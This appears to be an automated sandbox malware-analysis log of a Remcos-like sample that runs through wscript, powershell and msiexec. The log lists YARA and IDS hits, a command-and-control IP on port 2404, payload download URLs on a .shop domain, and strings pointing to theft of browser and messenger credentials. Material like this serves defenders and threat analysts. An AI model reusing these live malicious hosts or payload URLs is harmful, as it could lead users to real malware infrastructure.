              Source: Yara matchFile source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_209010F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20906580 FindFirstFileExA,7_2_20906580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49960 -> 154.216.18.214:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49971 -> 154.216.18.214:2404
              Source: Malware configuration extractorIPs: 154.216.18.214
              Source: global trafficTCP traffic: 192.168.2.7:49960 -> 154.216.18.214:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49972 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49930 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: global trafficHTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: sf4l.shop
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: wscript.exe, 00000000.00000002.1356231389.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333582119.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9788D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356231389.0000023D97822000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9781D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1355418070.0000023D977D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354833341.0000023D977CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG=Def
              Source: wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e936f3372f
              Source: msiexec.exe, 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854570981.0000000005066000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1794345263.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634426863.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779759485.000000000506C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1789210479.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854784125.000000000506F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpp
              Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E66A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf4l.shop
              Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhv528A.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv528A.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
              Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 0000000B.00000002.1811369548.00000000029A2000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv528A.tmp.11.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
              Source: bhv528A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv528A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv528A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv528A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv528A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: bhv528A.tmp.11.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv528A.tmp.11.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: bhv528A.tmp.11.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhv528A.tmp.11.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv528A.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv528A.tmp.11.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
              Source: bhv528A.tmp.11.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
              Source: bhv528A.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
              Source: bhv528A.tmp.11.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
              Source: bhv528A.tmp.11.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
              Source: bhv528A.tmp.11.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
              Source: bhv528A.tmp.11.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
              Source: bhv528A.tmp.11.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
